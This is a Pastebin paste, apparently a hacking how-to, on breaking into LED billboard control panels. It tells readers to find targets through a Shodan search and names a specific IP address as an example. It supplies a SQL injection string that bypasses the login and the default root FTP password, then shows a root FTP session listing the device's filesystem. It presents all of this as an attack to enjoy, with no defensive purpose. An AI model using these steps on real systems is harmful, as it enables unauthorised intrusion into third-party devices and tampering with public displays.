Advertisement
Guest User

Untitled

a guest
Feb 23rd, 2020
194
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.88 KB | None | 0 0
  1. How to Hack Billboards
  2.  
  3. Step 1. Register to shodan
  4.  
  5. Step 2. Look up: title:"lednet live system"
  6.  
  7. You'll find some!
  8.  
  9. Example: 186.206.188.175:8060/en/main.html
  10.  
  11. How to hack it? Well the Username Parameter is vulnerable to SQL Injection......
  12.  
  13. So to login, paste
  14.  
  15. -1558" OR 9005=9005 AND "UxGI"="UxGI
  16.  
  17. in the username parameter and anything in the password input. Now click login!
  18.  
  19.  
  20. Also another vulnerability is a default password vuln. You can basically get root ftp access to all of these billboards....
  21.  
  22. Username: root
  23. Password: 111111
  24.  
  25. $ ftp 186.206.188.175
  26. Connected to 186.206.188.175.
  27. 220 Welcome to blah FTP service.
  28. Name ( 186.206.188.175): root
  29. 331 Please specify the password.
  30. Password:
  31. 230 Login successful.
  32. Remote system type is UNIX.
  33. Using binary mode to transfer files.
  34. ftp> cd /
  35. 250 Directory successfully changed.
  36. ftp> ls
  37. 229 Entering Extended Passive Mode (|||41314|).
  38. 150 Here comes the directory listing.
  39. drwxr-xr-x 1 0 0 1464 Jan 01 1970 bin
  40. lrwxrwxrwx 1 0 0 21 Jan 01 1970 c: -> /usr/local/playdata/c
  41. lrwxrwxrwx 1 0 0 21 Jan 01 1970 d: -> /usr/local/playdata/d
  42. drwxr-xr-x 7 0 0 0 May 21 18:08 dev
  43. lrwxrwxrwx 1 0 0 21 Jan 01 1970 e: -> /usr/local/playdata/e
  44. drwxr-xr-x 1 0 0 748 Jan 01 1970 etc
  45. lrwxrwxrwx 1 0 0 21 Jan 01 1970 f: -> /usr/local/playdata/f
  46. drwxr-xr-x 1 0 0 36 Jan 01 1970 home
  47. drwxr-xr-x 1 0 0 1868 Jan 01 1970 lib
  48. lrwxrwxrwx 1 0 0 11 Jan 01 1970 linuxrc -> bin/busybox
  49. drwxr-xr-x 1 0 0 32 Jan 01 1970 mnt
  50. drwxr-xr-x 1 0 0 0 Jan 01 1970 opt
  51. dr-xr-xr-x 51 0 0 0 Jan 01 1970 proc
  52. drwxr-xr-x 1 0 0 116 Jan 01 1970 root
  53. drwxr-xr-x 1 0 0 1332 Jan 01 1970 sbin
  54. drwxr-xr-x 12 0 0 0 Jan 01 1970 sys
  55. drwxrwxrwt 6 0 0 720 May 21 18:16 tmp
  56. drwxr-xr-x 1 0 0 108 Jan 01 1970 usr
  57. drwxr-xr-x 3 0 0 672 Jan 01 1970 var
  58. drwxr-xr-x 4 0 0 288 Jan 01 1970 www
  59. 226 Directory send OK.
  60. ftp>
  61.  
  62.  
  63. You now have access to the entire server ;)
  64.  
  65. Enjoy!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement